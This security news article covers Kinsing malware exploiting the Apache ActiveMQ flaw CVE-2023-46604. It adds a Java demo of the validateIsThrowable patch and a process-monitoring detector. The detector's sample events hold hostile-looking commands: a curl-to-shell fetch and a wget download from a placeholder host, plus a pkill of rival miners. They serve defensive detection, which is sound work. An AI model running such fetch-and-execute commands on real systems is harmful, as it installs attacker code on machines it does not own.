A critical vulnerability in Apache ActiveMQ, tracked as CVE-2023-46604, is being actively exploited by the notorious Kinsing malware. As reported by Trend Micro, the flaw allows remote code execution on Linux systems because the broker did not adequately validate throwable class types carried in OpenWire commands.
Apache ActiveMQ, a widely used Java-based open source protocol for message-oriented middleware, serves as a communication bridge between different applications. Kinsing malware, which specifically targets Linux-based systems, takes advantage of web application vulnerabilities and misconfigured container environments to infiltrate servers and spread rapidly across networks.
Exploitation of CVE-2023-46604 has been reported since November, with threat actors using publicly available exploit tooling such as Metasploit and Nuclei. Despite its severity (CVSS score 9.8), detection rates remain relatively low.
John Gallagher, vice president of Viakoo Labs at Viakoo, highlighted the widespread usage of Apache ActiveMQ and its communication capabilities across various protocols, including MQTT. This makes it a prime target for threat actors looking to interface with IoT/OT/ICS devices, especially those lacking patching policies.
The Kinsing exploit leverages Java's ProcessBuilder method to download and execute cryptocurrency miners and malware on compromised systems. It actively seeks out and kills competing cryptocurrency miners to maximize its own share of the host's resources. In addition to CVE-2023-46604, the threat actors behind Kinsing also target other high-profile vulnerabilities such as CVE-2023-4911 (Looney Tunables).
Trend Micro advises users to promptly update and patch their systems to mitigate the risks associated with CVE-2023-46604. The patch introduces the “validateIsThrowable” method in the “BaseDataStreamMarshaller” class to address the root cause of the vulnerability.
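To make the root cause and the fix concrete, here is an added illustration (not ActiveMQ's own source) of the throwable unmarshalling path described above. The class name and the createThrowable stand-in are simplified assumptions; the validateIsThrowable check mirrors the idea of the patch: a class name taken from the wire may only be instantiated if it is actually a Throwable.

```java
// Added example, not code from Apache ActiveMQ. It models, in simplified form,
// how an OpenWire command carrying an exception is turned back into a Java
// object, and the class-type check the CVE-2023-46604 fix adds to
// BaseDataStreamMarshaller. Everything except the name validateIsThrowable
// is an assumption made for this demo.
import java.lang.reflect.Constructor;

public class ThrowableUnmarshalDemo {

    // The hardened check: only classes assignable to Throwable may be
    // instantiated from a class name that arrived inside an OpenWire command.
    static void validateIsThrowable(Class<?> clazz) {
        if (!Throwable.class.isAssignableFrom(clazz)) {
            throw new IllegalArgumentException(
                "Class " + clazz.getName() + " is not assignable to Throwable");
        }
    }

    // Simplified stand-in for the marshaller's createThrowable: the wire
    // carries a class name and a message string, and the broker builds the
    // exception via the class's (String) constructor. Without the check,
    // any class with a (String) constructor could be instantiated here.
    static Throwable createThrowable(String className, String message) throws Exception {
        // initialize=false: static initializers do not run before the check
        Class<?> clazz = Class.forName(className, false,
                ThrowableUnmarshalDemo.class.getClassLoader());
        validateIsThrowable(clazz);   // rejects every non-Throwable type
        Constructor<?> ctor = clazz.getConstructor(String.class);
        return (Throwable) ctor.newInstance(message);
    }

    public static void main(String[] args) throws Exception {
        // A legitimate remote exception is accepted as before.
        Throwable t = createThrowable("java.lang.IllegalStateException", "broker says no");
        System.out.println("accepted: " + t);

        // A non-Throwable class name is rejected before any constructor runs,
        // even though StringBuilder does have a (String) constructor.
        try {
            createThrowable("java.lang.StringBuilder", "ignored");
        } catch (IllegalArgumentException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The point of the ordering is that the check sits between class resolution and instantiation: the class is loaded without initialization, its type is verified, and only then is a constructor invoked. When auditing a patched broker, this is the behaviour to confirm rather than just the presence of the method name.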
Ken Dunham, director of cyber threat at Qualys, emphasizes the importance of prioritizing patching and remediation efforts, especially for external-facing assets and high-value systems. Extensive monitoring, logging reviews, and the implementation of workarounds can help mitigate known tactics, techniques, and procedures (TTPs) used in attacks until the risk of exploitation is fully remediated.
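The monitoring advice above, combined with the ProcessBuilder behaviour described earlier (the broker's Java process spawning a shell that downloads and runs a payload, or kills rival miners), suggests a simple host-side detection rule. The following is an added example and not tooling from Trend Micro, Qualys or the ActiveMQ project; the process-event lines are constructed for the demo and stand in for whatever auditd or EDR feed an environment actually has.

```java
// Added example, not from the page's sources. Flags shell children of an
// ActiveMQ broker process that download or run remote content, or that kill
// other processes. The event format "pid= ppid= comm= cmd=" is an assumption
// made for this demo; adapt the parse() method to your real telemetry.
import java.util.ArrayList;
import java.util.HashMap;
import java.util.HashSet;
import java.util.List;
import java.util.Map;
import java.util.Set;

public class BrokerChildProcessMonitor {

    // Constructed sample events (not real telemetry), one process start per line.
    static final String[] SAMPLE_EVENTS = {
        "pid=4100 ppid=1 comm=java cmd=java -jar activemq.jar start",
        "pid=4211 ppid=4100 comm=java cmd=java -version",
        "pid=4300 ppid=4100 comm=sh cmd=sh -c \"curl -s http://example.invalid/x.sh | sh\"",
        "pid=4301 ppid=4100 comm=bash cmd=bash -c \"pkill -f competing-miner\"",
        "pid=5000 ppid=1 comm=sshd cmd=sshd -D",
        "pid=5001 ppid=5000 comm=sh cmd=sh -c \"wget http://example.invalid/y\"",
    };

    static final Set<String> SHELLS = new HashSet<>(List.of("sh", "bash", "dash"));
    static final String[] DOWNLOADERS = {"curl ", "wget "};
    static final String[] PROCESS_KILLERS = {"pkill ", "kill ", "killall "};

    // Parse one event line into its fields. "cmd=" is taken as everything after
    // the marker, because the command line itself may contain spaces and '='.
    static Map<String, String> parse(String line) {
        Map<String, String> fields = new HashMap<>();
        int cmdAt = line.indexOf("cmd=");
        String head = cmdAt >= 0 ? line.substring(0, cmdAt) : line;
        for (String token : head.trim().split("\\s+")) {
            int eq = token.indexOf('=');
            if (eq > 0) fields.put(token.substring(0, eq), token.substring(eq + 1));
        }
        if (cmdAt >= 0) fields.put("cmd", line.substring(cmdAt + 4));
        return fields;
    }

    static boolean containsAny(String haystack, String[] needles) {
        for (String n : needles) if (haystack.contains(n)) return true;
        return false;
    }

    // Returns one finding per suspicious event. First pass collects broker
    // pids; second pass inspects shell children of those pids.
    static List<String> findSuspiciousChildren(String[] events) {
        Set<String> brokerPids = new HashSet<>();
        List<Map<String, String>> parsed = new ArrayList<>();
        for (String line : events) {
            Map<String, String> f = parse(line);
            parsed.add(f);
            if ("java".equals(f.get("comm")) && f.getOrDefault("cmd", "").contains("activemq")) {
                brokerPids.add(f.get("pid"));
            }
        }
        List<String> findings = new ArrayList<>();
        for (Map<String, String> f : parsed) {
            if (!brokerPids.contains(f.get("ppid"))) continue;   // not a broker child
            if (!SHELLS.contains(f.get("comm"))) continue;         // broker spawning a shell is the trigger
            String cmd = f.getOrDefault("cmd", "");
            if (containsAny(cmd, DOWNLOADERS)) {
                findings.add("HIGH pid=" + f.get("pid") + " broker child downloads remote content: " + cmd);
            } else if (containsAny(cmd, PROCESS_KILLERS)) {
                findings.add("MEDIUM pid=" + f.get("pid") + " broker child kills processes: " + cmd);
            } else {
                findings.add("LOW pid=" + f.get("pid") + " broker spawned a shell: " + cmd);
            }
        }
        return findings;
    }

    public static void main(String[] args) {
        // Expected on the sample data: pid 4300 (HIGH) and pid 4301 (MEDIUM);
        // 4211 is a java child, not a shell, and 5001's parent is not the broker.
        for (String finding : findSuspiciousChildren(SAMPLE_EVENTS)) {
            System.out.println(finding);
        }
    }
}
```

The rule is deliberately narrow: a message broker has little reason to spawn an interactive shell at all, so the parent-child relationship carries most of the signal, and the download and kill patterns only set the severity. Tune the broker identification (here the "activemq" substring in the java command line) to how the service is actually launched in your environment.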
In conclusion, organizations must remain vigilant and proactive in securing their systems against evolving threats like Kinsing malware by staying informed, applying patches promptly, and implementing robust security measures to safeguard their assets and data.